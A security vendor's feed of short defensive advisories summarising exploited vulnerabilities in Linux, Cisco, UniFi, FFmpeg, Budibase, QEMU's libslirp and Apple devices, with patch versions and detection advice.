Practitioner cybersecurity analysis from the Suriq desk.
What to patch, what to detect, and why it matters, in plain English.
Managed security built on Wazuh. suriq.io
#Cyber #ThreatDetection #CVE #CISA #Cybersecurity
| Suriq - Always on Watch | https://suriq.io |
One seizure, two devices. The locked iPhone was read end to end. The encrypted MacBook beside it gave up nothing.
The difference was encryption state when each was grabbed, not the lock screen.
The defender lesson for any device that can be seized:
https://suriq.io/blog/cellebrite-seized-device-encryption-lesson
🔴 EXPLOITED
Your file-integrity monitor is green. /bin/su was just rewritten anyway.
Linux kernel root bugs (DirtyClone, pedit COW) edit binaries in memory only. The disk file never changes.
Run multi-tenant Linux? Patch and disable unprivileged user namespaces.
Starting a fresh Signal account won't save you here.
Russian intelligence is phishing users for one secret: the Backup Recovery Key that decrypts your whole message history. It never expires.
Never paste it to anyone.
A PDF feature can be turned into a window into your servers.
php-weasyprint (1.2M+ installs) fetched attacker-controlled URLs server-side. Cloud metadata and local files were both in reach.
Run it? Upgrade to 2.6.0. (CVE-2026-49359)
🔴 EXPLOITED
Cisco Unified CM can be exploited to root.
But only if WebDialer is on, and it ships off by default. Check before you panic-patch.
The "active exploitation" so far is one source dropping a test file. (CVE-2026-20230)
https://suriq.io/blog/cisco-unified-cm-cve-2026-20230-exploited
A guest virtual machine can read its host's memory.
A patched flaw in libslirp, the networking QEMU uses by default in dev and CI, leaks gigabytes of host memory to a privileged guest.
Run QEMU VMs? Update libslirp to 4.9.2.
🔴 EXPLOITED
Patched in May. Being exploited in June.
If you self-host UniFi OS Server, anyone who can reach its web page can get root with no login.
Update to 5.0.8 now and lock down who can reach it. (CVE-2026-34908/909/910)
A video file your server opens by itself can run an attacker's commands.
PixelSmash (CVE-2026-8461) hits anything built on FFmpeg: Jellyfin, Nextcloud, your own upload pipelines.
Update FFmpeg to 8.1.2, then watch for media tools spawning a shell.
A single Budibase app builder can read every secret on your server.
A rigged app-icon upload exposes the master keys, forges an admin token, and reaches every workspace.
Self-hosted? Update to 3.39.9 and rotate secrets. (CVE-2026-54352)
Apple can't patch this one.
A cable and two seconds gives boot-level control of older iPhones, iPads and Watches (A12/A13 chips).
It won't hand over your data, but custody is now the real control.
https://suriq.io/blog/usbliter8-apple-bootrom-unpatchable-exploit
